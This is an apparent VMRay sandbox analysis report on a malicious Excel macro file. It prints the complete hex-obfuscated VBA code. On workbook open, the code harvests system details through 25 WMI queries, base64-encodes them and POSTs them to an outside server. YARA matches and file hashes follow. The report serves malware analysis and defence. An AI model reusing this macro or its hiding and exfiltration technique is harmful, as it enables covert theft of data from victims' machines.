d878a7c8...3ba3 | Files
Logo
Try VMRay Analyzer
VTI SCORE: 93/100
Dynamic Analysis Report
Classification: Downloader

d878a7c8fa46c52020a07de7726a8a740d245dcf0a58355b88a054059f933ba3 (SHA256)

Mert-Obfuscated25.xlsm

Excel Document

Created at 2019-02-17 13:34:00

...
Filters:
Filename Category Type Severity Actions
C:\Users\aETAdzjz\Desktop\Mert-Obfuscated25.xlsm Sample File Excel Document
Suspicious
...
»
Mime Type application/vnd.openxmlformats-officedocument.spreadsheetml.sheet
File Size 18.00 KB
MD5 915dfb45e8cc74a1b4c6ba4020072bf1 Copy to Clipboard
SHA1 0f5d9afab479682afca5f5d39f58d8e624dc988d Copy to Clipboard
SHA256 d878a7c8fa46c52020a07de7726a8a740d245dcf0a58355b88a054059f933ba3 Copy to Clipboard
SSDeep 384:Hea2kATkstJrM2Qw1Qth5otZMv5IJPPAva7:+FLwstJrkwaXi/MRPo Copy to Clipboard
Office Information
»
Create Time 2019-02-08 19:16:45+00:00
Modify Time 2019-02-08 19:19:15+00:00
Document Information
»
Application Microsoft Excel
App Version 16.0300
Document Security SecurityFlag.NONE
Heading Pairs Worksheets
Titles Of Parts Sheet1
ScaleCrop False
SharedDoc False
VBA Macros (1)
»
Macro #1: ThisWorkbook
» 
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Const nzslynpeha = 2
Const nefuhtkuev = 1
Const yxtfogysvi = 0
Sub Workbook_Open()
kobgwwizmj
End Sub
Sub kobgwwizmj()
Dim byfuecbw       As Object
Dim azrwemvrgxpef      As Object
Dim jdryvxbqqka       As Object
Dim vjmxuhqgswzhnlwtbzg        As Object
Dim yichuclkzdspcun               As Long
Dim yhuihbwhuwi               As Integer
Dim pxjjhyujtbsvoolqhqv               As Integer
Dim sWQL(1 To 25) As String
Dim arrMarks() As String
Dim wuvytgeakiv As String
Dim vrxgmbpd As Boolean
ReDim arrMarks(65535)
sWQL(1) = xmdhezkcfxfn("53656c656374202a2046") & xmdhezkcfxfn("726f6d2057696e33325f4e6574776f726b41646170746572436f6e66696775726174696f6e")
sWQL(2) = xmdhezkcfxfn("53656c656374202a2046726f6d2057696e33325f53797374656d") & xmdhezkcfxfn("456e636c6f73757265") 'PC
sWQL(3) = xmdhezkcfxfn("53656c656374202a2046726f6d2057696e33325f4c6f676963616c446973") & xmdhezkcfxfn("6b")
sWQL(4) = xmdhezkcfxfn("5365") & xmdhezkcfxfn("6c656374202a2046726f6d2057696e33325f50726f636573736f72")
sWQL(5) = xmdhezkcfxfn("53656c656374202a2046726f6d2057696e33325f5068") & xmdhezkcfxfn("79736963616c4d656d6f72794172726179")
sWQL(6) = xmdhezkcfxfn("53656c6563") & xmdhezkcfxfn("74202a2046726f6d2057696e33325f566964656f436f6e74726f6c6c6572")
sWQL(7) = xmdhezkcfxfn("53656c656374") & xmdhezkcfxfn("202a2046726f6d2057696e33325f4f6e426f617264446576696365")
sWQL(8) = xmdhezkcfxfn("53656c656374202a20") & xmdhezkcfxfn("46726f6d2057696e33325f4f7065726174696e6753797374656d")
sWQL(9) = xmdhezkcfxfn("53") & xmdhezkcfxfn("656c656374202a2046726f6d2057496e33325f5072696e746572")
sWQL(10) = xmdhezkcfxfn("53656c656374202a2046726f6d2057696e33325f5072") & xmdhezkcfxfn("6f64756374")
sWQL(11) = xmdhezkcfxfn("53656c656374202a2046726f6d205749") & xmdhezkcfxfn("6e33325f4163636f756e74")
sWQL(12) = xmdhezkcfxfn("53656c656374202a2046726f6d2057696e33325f436f6d7075746572") & xmdhezkcfxfn("53797374656d")
sWQL(13) = xmdhezkcfxfn("53656c656374202a2046726f6d2057696e33325f4261736553") & xmdhezkcfxfn("657276696365") 'List services running (or stopped) on any PC along with the service
sWQL(14) = xmdhezkcfxfn("53656c656374202a2066726f6d2057696e33325f5365") & xmdhezkcfxfn("7276696365")
sWQL(15) = xmdhezkcfxfn("53656c656374202a2066726f6d2057696e33325f4249") & xmdhezkcfxfn("4f53") 'Represents the attributes of the computer system
sWQL(16) = xmdhezkcfxfn("53656c656374202a2066726f6d2057696e33325f537973") & xmdhezkcfxfn("74656d42494f53")
sWQL(17) = xmdhezkcfxfn("53656c656374202a2066726f6d2057696e33325f44") & xmdhezkcfxfn("65736b746f70") 'Represents the common characteristics of a user
sWQL(18) = xmdhezkcfxfn("53656c656374202a2066726f6d2057696e3332") & xmdhezkcfxfn("5f456e7669726f6e6d656e74")
sWQL(19) = xmdhezkcfxfn("53656c656374202a2066726f6d2057696e33325f436f6d") & xmdhezkcfxfn("707574657253797374656d50726f64756374")
sWQL(20) = xmdhezkcfxfn("53") & xmdhezkcfxfn("656c656374202a2066726f6d2057696e33325f53746172747570436f6d6d616e64")
sWQL(21) = xmdhezkcfxfn("53656c656374202a2066726f6d20") & xmdhezkcfxfn("57696e33325f53797374656d426f6f74436f6e66696775726174696f6e")
sWQL(22) = xmdhezkcfxfn("53656c656374202a2066726f6d2057696e33325f537973") & xmdhezkcfxfn("74656d5365727669636573")
sWQL(23) = xmdhezkcfxfn("53656c656374202a2066726f") & xmdhezkcfxfn("6d2057696e33325f53797374656d53657474696e67")
sWQL(24) = xmdhezkcfxfn("53656c656374202a") & xmdhezkcfxfn("2066726f6d2057696e33325f53797374656d53797374656d447269766572")
sWQL(25) = xmdhezkcfxfn("53656c656374202a2066726f") & xmdhezkcfxfn("6d2057696e33325f4c6f676963616c50726f6772616d47726f7570")
For yhuihbwhuwi = LBound(sWQL) To UBound(sWQL)
pxjjhyujtbsvoolqhqv = pxjjhyujtbsvoolqhqv + 1
arrMarks(pxjjhyujtbsvoolqhqv) = xmdhezkcfxfn("2a2a2a2a") & xmdhezkcfxfn("2a20") & sWQL(yhuihbwhuwi) & xmdhezkcfxfn("202a2a") & xmdhezkcfxfn("2a2a2a") & vbCr
Set byfuecbw = GetObject(xmdhezkcfxfn("77696e6d676d") & xmdhezkcfxfn("74733a726f6f742f43494d5632"))
Set azrwemvrgxpef = byfuecbw.ExecQuery(sWQL(yhuihbwhuwi))
For Each jdryvxbqqka In azrwemvrgxpef
For Each vjmxuhqgswzhnlwtbzg In jdryvxbqqka.Properties_
pxjjhyujtbsvoolqhqv = pxjjhyujtbsvoolqhqv + 1
If IsArray(vjmxuhqgswzhnlwtbzg.Value) Then
For yichuclkzdspcun = LBound(vjmxuhqgswzhnlwtbzg.Value) To UBound(vjmxuhqgswzhnlwtbzg.Value)
If Not IsNull(vjmxuhqgswzhnlwtbzg.Value(yichuclkzdspcun)) Then
arrMarks(pxjjhyujtbsvoolqhqv) = vjmxuhqgswzhnlwtbzg.Name & xmdhezkcfxfn("28") & yichuclkzdspcun & xmdhezkcfxfn("29") & vjmxuhqgswzhnlwtbzg.Value(yichuclkzdspcun) & vbCr
End If
Next
ElseIf Not IsNull(vjmxuhqgswzhnlwtbzg.Value) Then
arrMarks(pxjjhyujtbsvoolqhqv) = vjmxuhqgswzhnlwtbzg.Name & xmdhezkcfxfn("20") & vjmxuhqgswzhnlwtbzg.Value & vbCr
End If
Next
Next
Next yhuihbwhuwi
ReDim Preserve arrMarks(pxjjhyujtbsvoolqhqv)
wuvytgeakiv = Join(arrMarks)
vrxgmbpd = avhvhswfvzznh(xmdhezkcfxfn("68747470733a2f2f7777772e6d6572747361726963612e63") & xmdhezkcfxfn("6f6d2f6d6163726f2e706870"), wuvytgeakiv)
End Sub
Function avhvhswfvzznh(sdjxjlakglxqfehcjcfw As String, pialnzoxqryieavfzgog As String)
Dim kscseprkyud
Set kscseprkyud = CreateObject(xmdhezkcfxfn("4d53584d4c32") & xmdhezkcfxfn("2e584d4c48545450"))
kscseprkyud.Open xmdhezkcfxfn("50") & xmdhezkcfxfn("4f5354"), sdjxjlakglxqfehcjcfw, False
kscseprkyud.setRequestHeader xmdhezkcfxfn("436f6e74656e74") & xmdhezkcfxfn("2d54797065"), xmdhezkcfxfn("6170706c69636174696f6e2f782d7777772d666f726d2d75726c656e") & xmdhezkcfxfn("636f646564")
kscseprkyud.send xmdhezkcfxfn("6d61") & xmdhezkcfxfn("63726f3d") & devoitudboz(pialnzoxqryieavfzgog)
End Function
Function devoitudboz(mbnqoyun As String) As String
Dim arrData() As Byte
arrData = StrConv(mbnqoyun, vbFromUnicode)
Dim zvlzrwnd As MSXML2.DOMDocument60
Dim mqwztjzkr As MSXML2.IXMLDOMElement
Set zvlzrwnd = New MSXML2.DOMDocument60
Set mqwztjzkr = zvlzrwnd.createElement(xmdhezkcfxfn("623634"))
mqwztjzkr.DataType = xmdhezkcfxfn("62696e2e") & xmdhezkcfxfn("626173653634")
mqwztjzkr.nodeTypedValue = arrData
devoitudboz = mqwztjzkr.Text
Set mqwztjzkr = Nothing
Set zvlzrwnd = Nothing
End Function
Private Function xmdhezkcfxfn(ByVal colrskqmyttf As String) As String
Dim rupwqucjovcf As Long
For rupwqucjovcf = 1 To Len(colrskqmyttf) Step 2
xmdhezkcfxfn = xmdhezkcfxfn & Chr$(Val("&H" & Mid$(colrskqmyttf, rupwqucjovcf, 2)))
Next rupwqucjovcf
End Function
YARA Matches
»
Rule Name Rule Description Classification Severity Actions
VBA_Download_Commands VBA macro may attempt to download external content; possible dropper -
3/5
...
VBA_Execution_Commands VBA macro may execute files or system commands -
3/5
...
VBA_Obfuscation_ObjectName VBA initializes COM object from long variable name; possible obfuscation -
2/5
...
de97ca4ae3df3fff588f38d6ba485cac9513307239aa46c806c3f6ce19a29dd8 Embedded File XML
Whitelisted
...
»
Parent File C:\Users\aETAdzjz\Desktop\Mert-Obfuscated25.xlsm
Mime Type application/xml
File Size 0.66 KB
MD5 657ada625cec137fc53e444956261bab Copy to Clipboard
SHA1 a33d091b2aa6689be34815b4784811f45c4dd745 Copy to Clipboard
SHA256 de97ca4ae3df3fff588f38d6ba485cac9513307239aa46c806c3f6ce19a29dd8 Copy to Clipboard
SSDeep 12:TMHdtl46fxhmflbEOEfWKvA1EI+DYQBsOD3O7xVIO/GaBTslXyld:2dti6fxhmflYZf8P+Kw3O7x6O/BTsEld Copy to Clipboard
File Reputation Information
»
Severity
Whitelisted
First Seen 2012-12-21 23:40 (UTC+1)
Last Seen 2019-01-22 13:34 (UTC+1)
ccfd9fdf98e7ecdee89d8d98365cac678000cdf350d49f87ac37debe4f0d732d Embedded File XML
Whitelisted
...
»
Parent File C:\Users\aETAdzjz\Desktop\Mert-Obfuscated25.xlsm
Mime Type application/xml
File Size 0.66 KB
MD5 c1a08e4a5909ec8a545236a0d9bce44d Copy to Clipboard
SHA1 63561ba33e3e8615f5883f6da15de948ad65578a Copy to Clipboard
SHA256 ccfd9fdf98e7ecdee89d8d98365cac678000cdf350d49f87ac37debe4f0d732d Copy to Clipboard
SSDeep 12:TMHdtWa6fmEUdzXb6flbEIWOgzXa6flbEetzXV6flbEpSp0HjzXQ4+DYQDE0US1V:2dtWa6ffa7b6flYIO7a6flYq7V6flYm1 Copy to Clipboard
File Reputation Information
»
Severity
Whitelisted
First Seen 2013-03-17 16:09 (UTC+1)
Last Seen 2019-01-22 13:34 (UTC+1)
ff19338e683f118d3df8438275ac9a67fccebe7b3992406852156fa0f068d855 Embedded File Text
Unknown
...
»
Parent File C:\Users\aETAdzjz\Desktop\Mert-Obfuscated25.xlsm
Mime Type text/plain
File Size 0.02 KB
MD5 dde455ee85d32b4157a3562e8c1c0219 Copy to Clipboard
SHA1 de77f3290c856cd00e606061071cabe4032de2a5 Copy to Clipboard
SHA256 ff19338e683f118d3df8438275ac9a67fccebe7b3992406852156fa0f068d855 Copy to Clipboard
SSDeep 3:kTa4+KOAb0:k+zKOx Copy to Clipboard
c355d1a1ac3a10dfbfbdf579fce19bbdde85927068c2325c8743bdae6e952aad Embedded File XML
Unknown
...
»
Parent File C:\Users\aETAdzjz\Desktop\Mert-Obfuscated25.xlsm
Mime Type application/xml
File Size 0.99 KB
MD5 e127b4f14436cd43ac37a90c5bc827fe Copy to Clipboard
SHA1 d443d74fd0951405884761da70c9313c2ad929dc Copy to Clipboard
SHA256 c355d1a1ac3a10dfbfbdf579fce19bbdde85927068c2325c8743bdae6e952aad Copy to Clipboard
SSDeep 24:2dt06fxhmflYZf8qC+B22n19e9wJvcpfNNtC+B2U6Zt:cV5hmNYZt1B7KCJkpfNNt1BIX Copy to Clipboard
59857481089a8fee53aee5d13f381ff666063f534580696c5103dcdd92529247 Embedded File Unknown
Unknown
...
»
Parent File C:\Users\aETAdzjz\Desktop\Mert-Obfuscated25.xlsm
Mime Type application/CDFV2-unknown
File Size 25.50 KB
MD5 0f2a860e7199007c769b5bc60b653e64 Copy to Clipboard
SHA1 edc25ccba8ae02809da82f3e0d1d7e13b5be095f Copy to Clipboard
SHA256 59857481089a8fee53aee5d13f381ff666063f534580696c5103dcdd92529247 Copy to Clipboard
SSDeep 384:NNiKZ8gcNZfsp99p8zfKxUJC3QW9T+5HhAadaX:ANZfspWfKDt+5HhAadaX Copy to Clipboard
5e476c7ad93cb7f49940db8b59d4aced016ec1b168b617db1b54f23303f082da Embedded File Text
Unknown
...
»
Parent File C:\Users\aETAdzjz\Desktop\Mert-Obfuscated25.xlsm
Mime Type text/plain
File Size 0.02 KB
MD5 08c7de6296c09d10dec36654196ed93c Copy to Clipboard
SHA1 c399efc356adad3ab7279ba6e92e9fd7934dec6e Copy to Clipboard
SHA256 5e476c7ad93cb7f49940db8b59d4aced016ec1b168b617db1b54f23303f082da Copy to Clipboard
SSDeep 3:kTa4+KOAbI:k+zKO1 Copy to Clipboard
Exit-Icon
WHOIS Domain Information
Domain Name
WHOIS Response 

       		
      

     

    

   

  

  

  

  

   

    
    

     Function Logfile
    

    

     

      Download-Icon
     

    

    

     Exit-Icon
    

   

   

    

     

      
       This feature requires an online-connection to the VMRay backend.
      
      

      

      An offline version with limited functionality is also provided.
      

      The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy".
     

     

    

   

   

    Before
   

   

    

     

      
       This feature requires an online-connection to the VMRay backend.
      
      

      

      An offline version with limited functionality is also provided.
      

      The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy".
     

     

    

   

   

    After
   

   

    

     

      
       This feature requires an online-connection to the VMRay backend.
      
      

      

      An offline version with limited functionality is also provided.
      

      The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy".
     

     

    

   

   

    

     
      

       
       
       
       
      

     
     
     
    

   

  

  

   

    
    

     Screenshot
    

    

     Expand-Icon
    

    

     Exit-Icon
    

   

   

    

     icon_left
    

    

     icon_left
    

   

   

   

   

    image